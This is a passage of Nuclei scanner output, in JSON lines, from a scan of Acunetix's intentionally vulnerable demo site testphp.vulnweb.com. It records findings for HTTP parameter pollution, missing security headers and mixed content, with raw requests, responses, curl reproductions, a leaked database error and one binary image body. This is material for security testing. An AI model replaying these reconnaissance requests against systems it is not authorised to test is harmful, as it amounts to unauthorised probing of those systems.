close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:19.006000959Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:19.006031469Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/mixed-passive-content.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/mixed-passive-content\",\"template-id\":\"mixed-passive-content\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/mixed-passive-content.yaml\",\"info\":{\"name\":\"Mixed Passive Content\",\"author\":[\"liwermor\"],\"tags\":[\"misconfig\"],\"description\":\"This check detects if there are any passive content being loaded over HTTP instead of HTTPS.\\n\",\"reference\":[\"https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content\",\"https://portswigger.net/kb/issues/01000400_mixed-content\",\"https://resources.infosecinstitute.com/topics/vulnerabilities/https-mixed-content-vulnerability/\",\"https://docs.gitlab.com/ee/user/application_security/dast/checks/319.1.html\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"img\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"extracted-results\":[\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\"],\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:19.00606011Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:19.38411726Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\